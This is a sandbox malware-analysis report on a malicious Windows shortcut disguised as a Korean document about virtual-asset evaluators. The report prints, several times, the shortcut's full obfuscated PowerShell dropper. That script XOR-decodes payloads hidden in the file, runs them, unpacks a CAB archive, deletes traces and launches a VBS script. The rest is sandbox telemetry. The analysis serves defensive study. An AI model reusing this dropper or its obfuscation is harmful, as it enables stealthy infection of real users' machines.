Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 2, 2025, 8:52 a.m.	May 2, 2025, 8:54 a.m.

Size	1.8MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`cbd734874b44e73ce155998db7e6663a`
SHA256	`f9f3b762ed1719bf141c38f8c4f21d76cd65c5ac6c62a4b94ce68569ce87178c`
CRC32	`2511EC3C`
ssdeep	`3072:cHjKZQ7Bf0Rbs/UOzz+Zo64VT25k7oZYEUfZFy3J2GEU7i03O1JX6RXKC2Nl/:3Q75gsl+Zo64VTakpfe2Gdi03O7qRXKB`
Yara	Lnk_Format_Zero - LNK Format Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "DbQWpNgHYB" "C:\Users\test22\AppData\Local\Temp\가상자산 관련 외부평가위원 위촉 안내.hwp.lnk"
3028
- cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" ) )
  2216
  - cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
    196
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
      2364
    - findstr.exe findstr /i rshell.exe
      2416
  - powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;"
    1228
    - expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\agenda.cab -F:* C:\Users\Public\documents
      236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 2, 2025, 8:52 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 2, 2025, 8:52 a.m.			0	0

Command line console output was observed (50 out of 916 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: exist "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" console_handle: 0x00000007	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: "function bother{param($result); <#pursue courage#>$access = $result.substring(0,$result.length-4) + ''; <#red left#>return $access;};function emergency{param($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Begin);<#mood which#> $present=$signal0x01;<#classic professor#> $truth=New''-O''bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Obj''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream=0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream0x01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m'+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connection); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> return $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; &$naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};function bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contract; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid = bank; <#just partnership#>$team = used -rural $acid;} return $team;};function practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glass access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#>+'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};function used{param($rural); <#enable background#> $severe=''; [System.IO.Directory]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#south text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm#> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = protein;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -protection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy storm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practical;<#write silent#>discourse -orientation <#after glance#> $rare -protection <#violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#controversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>emergency -propose $rare;$size = massive;<#emotional below#>actress -funny $meeting -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kill = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill;" console_handle: 0x00000007	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: Method invocation failed because [System.IO.FileInfo] doesn't contain a method console_handle: 0x00000023	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: named 'new'. console_handle: 0x0000002f	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: At line:1 char:2208 console_handle: 0x0000003b	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: + function bother{param($result); <#pursue courage#>$access = $result.substring console_handle: 0x00000047	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: (0,$result.length-4) + ''; <#red left#>return $access;};function emergency{para console_handle: 0x00000053	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: m($propose); re''m''ov''e''-it''e''m $propose -Force;};function discourse{param console_handle: 0x0000005f	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: ($orientation,$protection,$signal,$comment,$comedy);<#station apple#> $egg=N''e console_handle: 0x0000006b	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: w''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal console_handle: 0x00000077	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: get#>[System.IO.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<# console_handle: 0x00000083	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: collection focus#> $egg.Seek(<#one care#>$protection,[System.IO.SeekOrigin]::Be console_handle: 0x0000008f	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: gin);<#mood which#> $present=$signal*0x01;<#classic professor#> $truth=New''-O' console_handle: 0x0000009b	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: 'bj''ect byte[] <#etc mostly#>$signal; <#chef consequence#> $consume=Ne''w-''Ob console_handle: 0x000000a7	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: j''ec''t byte[] <#ancient visible#>$present; <#crack occupy#>$egg.Read(<#exerci console_handle: 0x000000b3	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: se actually#>$consume,0,<#encounter carefully#>$present); $egg.Close();$stream= console_handle: 0x000000bf	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: 0;while($stream -lt $signal){<#claim thank#>$truth[$stream]=$consume[$stream*0x console_handle: 0x000000cb	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: 01] -bxor $comment;$stream++;}<#subsequent bathroom#> s''et-''c''o''n''t''ent $ console_handle: 0x000000d7	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: comedy <#block greatest#> $truth -Encoding <#comedy council#> Byte;};function m console_handle: 0x000000e3	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: assive{$enter = $env:public<#heavy deeply#> + '\' +<#guess proud#> 'do'+'cu'+'m console_handle: 0x000000ef	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: '+'en'+'ts';<#incredible coat#> return $enter;};function habit{param($connectio console_handle: 0x000000fb	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: n); <#here control#>$agreement = Spl''it''-Pa''th $connection;<#giant tail#> re console_handle: 0x00000107	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: turn $agreement;};function actress{param($funny, $gap); $naked = 'exp'+'and'; & console_handle: 0x00000113	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: $naked $funny -F:* $gap;};function contract{return Get''-Lo''c''at''ion;};func console_handle: 0x0000011f	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: tion bank{<#emotional tear#>return $env:Temp;};function protein{$acid = contrac console_handle: 0x0000012b	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: t; $team = used -rural $acid; <#badly subsequent#>if($team.length -eq 0) {$acid console_handle: 0x00000137	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: = bank; <#just partnership#>$team = used -rural $acid;} return $team;};functio console_handle: 0x00000143	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: n practical{$Mr = $env:public<#rose pour#> + '\' + 'ag'+'enda'+'.ca'+'b';<#glas console_handle: 0x0000014f	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: s access#> return $Mr;};function girlfriend{$ill = $env:public<#mall remember#> console_handle: 0x0000015b	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: +'\d'+'oc'+'umen'+'ts\'+'st'+'art'+'.vb'+'s';<#thus father#> return $ill;};func console_handle: 0x00000167	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: tion used{param($rural); <#enable background#> $severe=''; [System.IO.Directory console_handle: 0x00000173	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: ]::GetFiles($rural, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) \| <#s console_handle: 0x0000017f	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: outh text#>ForEach-Object { <#DNA cake#> $terror = [System.IO.FileInfo]::new << console_handle: 0x0000018b	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: << ($_); <#championship tree#> if ($terror.Length -eq 0x001CD181) { <#will warm console_handle: 0x00000197	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: #> $severe = $terror.FullName;}}; return <#role never#> $severe;};$rare = prote console_handle: 0x000001a3	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: in;<#north humor#>$understand = habit -connection $rare;<#producer flat#> $eye console_handle: 0x000001af	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: = bother -result $rare;discourse -orientation <#tribe instruction#> $rare -prot console_handle: 0x000001bb	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: ection <#those regulation#> 0x00002338 -signal 0x00015800 -comment <#strategy s console_handle: 0x000001c7	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: torm#> 0x71 -comedy <#baby Irish#> $eye;<#grant shower#> & $eye;$meeting=practi console_handle: 0x000001d3	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: cal;<#write silent#>discourse -orientation <#after glance#> $rare -protection < console_handle: 0x000001df	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: #violent effect#> 0x00017B38 -signal <#open inquiry#> 0x00013CCE -comment <#con console_handle: 0x000001eb	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: troversy Canadian#> 0x70 -comedy <#basis existing#> $meeting;<#provide sin#>eme console_handle: 0x000001f7	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: rgency -propose $rare;$size = massive;<#emotional below#>actress -funny $meetin console_handle: 0x00000203	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: g -gap <#severe thank#>$size;<#airline nearly#>emergency -propose $meeting;$kil console_handle: 0x0000020f	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: l = <#solution fair#>girlfriend;<#publisher ingredient#>& $kill; console_handle: 0x0000021b	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: + CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept console_handle: 0x00000227	1	1
WriteConsoleW May 2, 2025, 8:52 a.m.	buffer: ion console_handle: 0x00000233	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fe50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fe50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fe50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fa50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fa50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fa50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fa50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fa50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fa50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027fc10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00280050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027ff10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2025, 8:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0027f690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 2, 2025, 8:52 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 164 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2025, 8:52 a.m.	process_identifier: 1228 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
